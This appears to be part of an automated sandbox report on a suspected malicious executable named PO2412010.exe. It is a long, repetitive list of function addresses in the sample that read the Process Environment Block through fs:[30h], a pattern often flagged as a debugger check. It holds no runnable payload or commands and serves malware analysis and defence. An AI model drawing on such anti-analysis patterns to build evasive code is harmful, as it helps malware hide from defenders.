                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B54164 mov eax, dword ptr fs:[00000030h] 3_2_01B54164
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B54164 mov eax, dword ptr fs:[00000030h] 3_2_01B54164
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B18158 mov eax, dword ptr fs:[00000030h] 3_2_01B18158
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7C156 mov eax, dword ptr fs:[00000030h] 3_2_01A7C156
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h] 3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h] 3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B14144 mov ecx, dword ptr fs:[00000030h] 3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h] 3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h] 3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A86154 mov eax, dword ptr fs:[00000030h] 3_2_01A86154
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A86154 mov eax, dword ptr fs:[00000030h] 3_2_01A86154
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A780A0 mov eax, dword ptr fs:[00000030h] 3_2_01A780A0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B460B8 mov eax, dword ptr fs:[00000030h] 3_2_01B460B8
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B460B8 mov ecx, dword ptr fs:[00000030h] 3_2_01B460B8
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B180A8 mov eax, dword ptr fs:[00000030h] 3_2_01B180A8
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A8208A mov eax, dword ptr fs:[00000030h] 3_2_01A8208A
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A880E9 mov eax, dword ptr fs:[00000030h] 3_2_01A880E9
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7A0E3 mov ecx, dword ptr fs:[00000030h] 3_2_01A7A0E3
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B060E0 mov eax, dword ptr fs:[00000030h] 3_2_01B060E0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7C0F0 mov eax, dword ptr fs:[00000030h] 3_2_01A7C0F0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC20F0 mov ecx, dword ptr fs:[00000030h] 3_2_01AC20F0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B020DE mov eax, dword ptr fs:[00000030h] 3_2_01B020DE
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B16030 mov eax, dword ptr fs:[00000030h] 3_2_01B16030
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7A020 mov eax, dword ptr fs:[00000030h] 3_2_01A7A020
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7C020 mov eax, dword ptr fs:[00000030h] 3_2_01A7C020
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B04000 mov ecx, dword ptr fs:[00000030h] 3_2_01B04000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h] 3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h] 3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h] 3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h] 3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h] 3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AAC073 mov eax, dword ptr fs:[00000030h] 3_2_01AAC073
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B06050 mov eax, dword ptr fs:[00000030h] 3_2_01B06050
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A82050 mov eax, dword ptr fs:[00000030h] 3_2_01A82050
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AA438F mov eax, dword ptr fs:[00000030h] 3_2_01AA438F
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AA438F mov eax, dword ptr fs:[00000030h] 3_2_01AA438F
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7E388 mov eax, dword ptr fs:[00000030h] 3_2_01A7E388
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7E388 mov eax, dword ptr fs:[00000030h] 3_2_01A7E388
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7E388 mov eax, dword ptr fs:[00000030h] 3_2_01A7E388
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A78397 mov eax, dword ptr fs:[00000030h] 3_2_01A78397
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A78397 mov eax, dword ptr fs:[00000030h] 3_2_01A78397
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A78397 mov eax, dword ptr fs:[00000030h] 3_2_01A78397
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h] 3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h] 3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB63FF mov eax, dword ptr fs:[00000030h]3_2_01AB63FF
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B243D4 mov eax, dword ptr fs:[00000030h]3_2_01B243D4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B243D4 mov eax, dword ptr fs:[00000030h]3_2_01B243D4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov eax, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov eax, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov ecx, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov eax, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B063C0 mov eax, dword ptr fs:[00000030h]3_2_01B063C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3C3CD mov eax, dword ptr fs:[00000030h]3_2_01B3C3CD
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov eax, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov ecx, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov eax, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov eax, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA30B mov eax, dword ptr fs:[00000030h]3_2_01ABA30B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA30B mov eax, dword ptr fs:[00000030h]3_2_01ABA30B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA30B mov eax, dword ptr fs:[00000030h]3_2_01ABA30B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7C310 mov ecx, dword ptr fs:[00000030h]3_2_01A7C310
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA0310 mov ecx, dword ptr fs:[00000030h]3_2_01AA0310
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2437C mov eax, dword ptr fs:[00000030h]3_2_01B2437C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B28350 mov ecx, dword ptr fs:[00000030h]3_2_01B28350
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4A352 mov eax, dword ptr fs:[00000030h]3_2_01B4A352
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov ecx, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B5634F mov eax, dword ptr fs:[00000030h]3_2_01B5634F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902A0 mov eax, dword ptr fs:[00000030h]3_2_01A902A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902A0 mov eax, dword ptr fs:[00000030h]3_2_01A902A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov ecx, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE284 mov eax, dword ptr fs:[00000030h]3_2_01ABE284
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE284 mov eax, dword ptr fs:[00000030h]3_2_01ABE284
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00283 mov eax, dword ptr fs:[00000030h]3_2_01B00283
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00283 mov eax, dword ptr fs:[00000030h]3_2_01B00283
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00283 mov eax, dword ptr fs:[00000030h]3_2_01B00283
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902E1 mov eax, dword ptr fs:[00000030h]3_2_01A902E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902E1 mov eax, dword ptr fs:[00000030h]3_2_01A902E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902E1 mov eax, dword ptr fs:[00000030h]3_2_01A902E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B562D6 mov eax, dword ptr fs:[00000030h]3_2_01B562D6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7823B mov eax, dword ptr fs:[00000030h]3_2_01A7823B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A84260 mov eax, dword ptr fs:[00000030h]3_2_01A84260
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A84260 mov eax, dword ptr fs:[00000030h]3_2_01A84260
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A84260 mov eax, dword ptr fs:[00000030h]3_2_01A84260
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7826B mov eax, dword ptr fs:[00000030h]3_2_01A7826B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3A250 mov eax, dword ptr fs:[00000030h]3_2_01B3A250
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3A250 mov eax, dword ptr fs:[00000030h]3_2_01B3A250
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B5625D mov eax, dword ptr fs:[00000030h]3_2_01B5625D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A86259 mov eax, dword ptr fs:[00000030h]3_2_01A86259
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B08243 mov eax, dword ptr fs:[00000030h]3_2_01B08243
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B08243 mov ecx, dword ptr fs:[00000030h]3_2_01B08243
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7A250 mov eax, dword ptr fs:[00000030h]3_2_01A7A250
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B005A7 mov eax, dword ptr fs:[00000030h]3_2_01B005A7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B005A7 mov eax, dword ptr fs:[00000030h]3_2_01B005A7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B005A7 mov eax, dword ptr fs:[00000030h]3_2_01B005A7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA45B1 mov eax, dword ptr fs:[00000030h]3_2_01AA45B1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA45B1 mov eax, dword ptr fs:[00000030h]3_2_01AA45B1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB4588 mov eax, dword ptr fs:[00000030h]3_2_01AB4588
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A82582 mov eax, dword ptr fs:[00000030h]3_2_01A82582
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A82582 mov ecx, dword ptr fs:[00000030h]3_2_01A82582
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE59C mov eax, dword ptr fs:[00000030h]3_2_01ABE59C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABC5ED mov eax, dword ptr fs:[00000030h]3_2_01ABC5ED
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABC5ED mov eax, dword ptr fs:[00000030h]3_2_01ABC5ED
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A825E0 mov eax, dword ptr fs:[00000030h]3_2_01A825E0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE5E7 mov eax, dword ptr fs:[00000030h]3_2_01AAE5E7
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE5CF mov eax, dword ptr fs:[00000030h]3_2_01ABE5CF
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE5CF mov eax, dword ptr fs:[00000030h]3_2_01ABE5CF
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A865D0 mov eax, dword ptr fs:[00000030h]3_2_01A865D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA5D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA5D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA5D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA5D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE53E mov eax, dword ptr fs:[00000030h]3_2_01AAE53E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE53E mov eax, dword ptr fs:[00000030h]3_2_01AAE53E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE53E mov eax, dword ptr fs:[00000030h]3_2_01AAE53E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE53E mov eax, dword ptr fs:[00000030h]3_2_01AAE53E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE53E mov eax, dword ptr fs:[00000030h]3_2_01AAE53E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90535 mov eax, dword ptr fs:[00000030h]3_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90535 mov eax, dword ptr fs:[00000030h]3_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90535 mov eax, dword ptr fs:[00000030h]3_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90535 mov eax, dword ptr fs:[00000030h]3_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90535 mov eax, dword ptr fs:[00000030h]3_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90535 mov eax, dword ptr fs:[00000030h]3_2_01A90535
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B16500 mov eax, dword ptr fs:[00000030h]3_2_01B16500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54500 mov eax, dword ptr fs:[00000030h]3_2_01B54500
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB656A mov eax, dword ptr fs:[00000030h]3_2_01AB656A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB656A mov eax, dword ptr fs:[00000030h]3_2_01AB656A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB656A mov eax, dword ptr fs:[00000030h]3_2_01AB656A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88550 mov eax, dword ptr fs:[00000030h]3_2_01A88550
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88550 mov eax, dword ptr fs:[00000030h]3_2_01A88550
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0A4B0 mov eax, dword ptr fs:[00000030h]3_2_01B0A4B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A864AB mov eax, dword ptr fs:[00000030h]3_2_01A864AB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB44B0 mov ecx, dword ptr fs:[00000030h]3_2_01AB44B0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3A49A mov eax, dword ptr fs:[00000030h]3_2_01B3A49A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A804E5 mov ecx, dword ptr fs:[00000030h]3_2_01A804E5
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7C427 mov eax, dword ptr fs:[00000030h]3_2_01A7C427
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7E420 mov eax, dword ptr fs:[00000030h]3_2_01A7E420
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7E420 mov eax, dword ptr fs:[00000030h]3_2_01A7E420
